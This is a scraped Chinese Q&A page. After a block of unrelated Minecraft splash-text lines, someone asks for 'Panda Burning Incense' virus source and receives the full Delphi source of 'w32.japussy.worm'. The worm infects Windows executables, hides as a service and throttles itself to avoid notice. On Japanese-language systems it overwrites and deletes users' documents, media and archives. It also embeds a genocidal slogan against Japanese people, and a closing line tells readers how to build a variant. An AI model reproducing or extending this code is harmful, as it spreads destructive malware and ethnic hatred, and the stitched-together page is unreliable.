Tougher than diamonds, rich like cream!
Getting ready to show!
Getting ready to know!
Getting ready to drop!
Getting ready to shock!
Getting ready to freak!
Getting ready to speak!
It swings, it jives!
Cruising streets for gold!
Take an eggbeater and beat it against a skillet!
Make me a table, a funky table!
Take the elevator to the mezzanine!
Stop being reasonable, this is the Internet!
/give @a hugs 64
This is good for Realms.
Any computer is a laptop if you're brave enough!
Do it all, everything!
Where there is not light, there can spider!
GNU Terry Pratchett
More Digital!
doot doot
Falling with style!
There's no stopping the Trollmaso
Throw yourself at the ground and miss
Rule #1: it's never my fault
Replaced molten cheese with blood?
Absolutely fixed relatively broken coordinates
Boats FTW
哪有熊猫烧香的源代码?
program japussy;
uses
windows, sysutils, classes, graphics, shellapi{, registry};
const
headersize = 82432; //病毒体的大小
iconoffset = $12eb8; //pe文件主图标的偏移量
//在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
headersize = 38912; //upx压缩过病毒体的大小
iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量
//upx 1.24w 用法: upx -9 --8086 japussy.exe
}
iconsize = $2e8; //pe文件主图标的大小--744字节
icontail = iconoffset + iconsize; //pe文件主图标的尾部
id = $44444444; //感染标记
//垃圾码,以备写入
catchword = 'if a race need to be killed out, it must be yamato. ' +
'if a country need to be destroyed, it must be japan! ' +
'*** w32.japussy.worm.a ***';
{$r *.res}
function registerserviceprocess(dwprocessid, dwtype: integer): integer;
stdcall; external 'kernel32.dll'; //函数声明
var
tmpfile: string;
si: startupinfo;
pi: process_information;
isjap: boolean = false; //日文操作系统标记
{ 判断是否为win9x }
function iswin9x: boolean;
var
ver: tosversioninfo;
begin
result := false;
ver.dwosversioninfosize := sizeof(tosversioninfo);
if not getversionex(ver) then
exit;
if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
result := true;
end;
{ 在流之间复制 }
procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
dstartpos: integer; count: integer);
var
scurpos, dcurpos: integer;
begin
scurpos := src.position;
dcurpos := dst.position;
src.seek(sstartpos, 0);
dst.seek(dstartpos, 0);
dst.copyfrom(src, count);
src.seek(scurpos, 0);
dst.seek(dcurpos, 0);
end;
{ 将宿主文件从已感染的pe文件中分离出来,以备使用 }
procedure extractfile(filename: string);
var
sstream, dstream: tfilestream;
begin
try
sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
dstream := tfilestream.create(filename, fmcreate);
try
sstream.seek(headersize, 0); //跳过头部的病毒部分
dstream.copyfrom(sstream, sstream.size - headersize);
finally
dstream.free;
end;
finally
sstream.free;
end;
except
end;
end;
{ 填充startupinfo结构 }
procedure fillstartupinfo(var si: startupinfo; state: word);
begin
si.cb := sizeof(si);
si.lpreserved := nil;
si.lpdesktop := nil;
si.lptitle := nil;
si.dwflags := startf_useshowwindow;
si.wshowwindow := state;
si.cbreserved2 := 0;
si.lpreserved2 := nil;
end;
{ 发带毒邮件 }
procedure sendmail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染pe文件 }
procedure infectonefile(filename: string);
var
hdrstream, srcstream: tfilestream;
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try //出错则文件正在被使用,退出
if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染
exit;
infected := false;
ispe := false;
srcstream := tfilestream.create(filename, fmopenread);
try
for i := 0 to $108 do //检查pe文件头
begin
srcstream.seek(i, sofrombeginning);
srcstream.read(buf, 2);
if (buf[0] = #80) and (buf[1] = #69) then //pe标记
begin
ispe := true; //是pe文件
break;
end;
end;
srcstream.seek(-4, sofromend); //检查感染标记
srcstream.read(iid, 4);
if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染
infected := true;
finally
srcstream.free;
end;
if infected or (not ispe) then //如果感染过了或不是pe文件则退出
exit;
icostream := tmemorystream.create;
dststream := tmemorystream.create;
try
aicon := ticon.create;
try
//得到被感染文件的主图标(744字节),存入流
aicon.releasehandle;
aicon.handle := extracticon(hinstance, pchar(filename), 0);
aicon.savetostream(icostream);
finally
aicon.free;
end;
srcstream := tfilestream.create(filename, fmopenread);
//头文件
hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
//写入病毒体主图标之前的数据
copystream(hdrstream, 0, dststream, 0, iconoffset);
//写入目前程序的主图标
copystream(icostream, 22, dststream, iconoffset, iconsize);
//写入病毒体主图标到病毒体尾部之间的数据
copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
//写入宿主程序
copystream(srcstream, 0, dststream, headersize, srcstream.size);
//写入已感染的标记
dststream.seek(0, 2);
iid := $44444444;
dststream.write(iid, 4);
finally
hdrstream.free;
end;
finally
srcstream.free;
icostream.free;
dststream.savetofile(filename); //替换宿主文件
dststream.free;
end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure smashfile(filename: string);
var
filehandle: integer;
i, size, mass, max, len: integer;
begin
try
setfileattributes(pchar(filename), 0); //去掉只读属性
filehandle := fileopen(filename, fmopenwrite); //打开文件
try
size := getfilesize(filehandle, nil); //文件大小
i := 0;
randomize;
max := random(15); //写入垃圾码的随机次数
if max < 5 then
max := 5;
mass := size div max; //每个间隔块的大小
len := length(catchword);
while i < max do
begin
fileseek(filehandle, i * mass, 0); //定位
//写入垃圾码,将文件彻底破坏掉
filewrite(filehandle, catchword, len);
inc(i);
end;
finally
fileclose(filehandle); //关闭文件
end;
deletefile(pchar(filename)); //删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function getdrives: string;
var
disktype: word;
d: char;
str: string;
i: integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
d := chr(i + 65);
str := d + ':\';
disktype := getdrivetype(pchar(str));
//得到本地磁盘和网络盘
if (disktype = drive_fixed) or (disktype = drive_remote) then
result := result + d;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procedure loopfiles(path, mask: string);
var
i, count: integer;
fn, ext: string;
subdir: tstrings;
searchrec: tsearchrec;
msg: tmsg;
function isvaliddir(searchrec: tsearchrec): integer;
begin
if (searchrec.attr <> 16) and (searchrec.name <> '.') and
(searchrec.name <> '..') then
result := 0 //不是目录
else if (searchrec.attr = 16) and (searchrec.name <> '.') and
(searchrec.name <> '..') then
result := 1 //不是根目录
else result := 2; //是根目录
end;
begin
if (findfirst(path + mask, faanyfile, searchrec) = 0) then
begin
repeat
peekmessage(msg, 0, 0, 0, pm_remove); //调整消息队列,避免引起怀疑
if isvaliddir(searchrec) = 0 then
begin
fn := path + searchrec.name;
ext := uppercase(extractfileext(fn));
if (ext = '.exe') or (ext = '.scr') then
begin
infectonefile(fn); //感染可执行文件
end
else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then
begin
//感染html和asp文件,将base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
else if ext = '.wab' then //outlook地址簿文件
begin
//获取outlook邮件地址
end
else if ext = '.adc' then //foxmail地址自动完成文件
begin
//获取foxmail邮件地址
end
else if ext = 'ind' then //foxmail地址簿文件
begin
//获取foxmail邮件地址
end
else
begin
if isjap then //是倭文操作系统
begin
if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
(ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
(ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
(ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
(ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
(ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
smashfile(fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免cpu占用率过高引起怀疑
sleep(200);
until (findnext(searchrec) <> 0);
end;
findclose(searchrec);
subdir := tstringlist.create;
if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then
begin
repeat
if isvaliddir(searchrec) = 1 then
subdir.add(searchrec.name);
until (findnext(searchrec) <> 0);
end;
findclose(searchrec);
count := subdir.count - 1;
for i := 0 to count do
loopfiles(path + subdir.strings + '\', mask);
freeandnil(subdir);
end;
{ 遍历磁盘上所有的文件 }
procedure infectfiles;
var
driverlist: string;
i, len: integer;
begin
if getacp = 932 then //日文操作系统
isjap := true; //去死吧!
driverlist := getdrives; //得到可写的磁盘列表
len := length(driverlist);
while true do //死循环
begin
for i := len downto 1 do //遍历每个磁盘驱动器
loopfiles(driverlist + ':\', '*.*'); //感染之
sendmail; //发带毒邮件
sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if iswin9x then //是win9x
registerserviceprocess(getcurrentprocessid, 1) //注册为服务进程
else //winnt
begin
//远程线程映射到explorer进程
//哪位兄台愿意完成之?
end;
//如果是原始病毒体自己
if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
infectfiles //感染和发邮件
else //已寄生于宿主程序上了,开始工作
begin
tmpfile := paramstr(0); //创建临时文件
delete(tmpfile, length(tmpfile) - 4, 4);
tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件,多一个空格
extractfile(tmpfile); //分离之
fillstartupinfo(si, sw_showdefault);
createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
0, nil, '.', si, pi); //创建新进程运行之
infectfiles; //感染和发邮件
end;
end.
把我说的..空格删去,,然后保存到C盘任何路径下..你大概就能得熊猫烧香变种
转载请注明出处51数据库 » word2007createind 求电脑病毒代码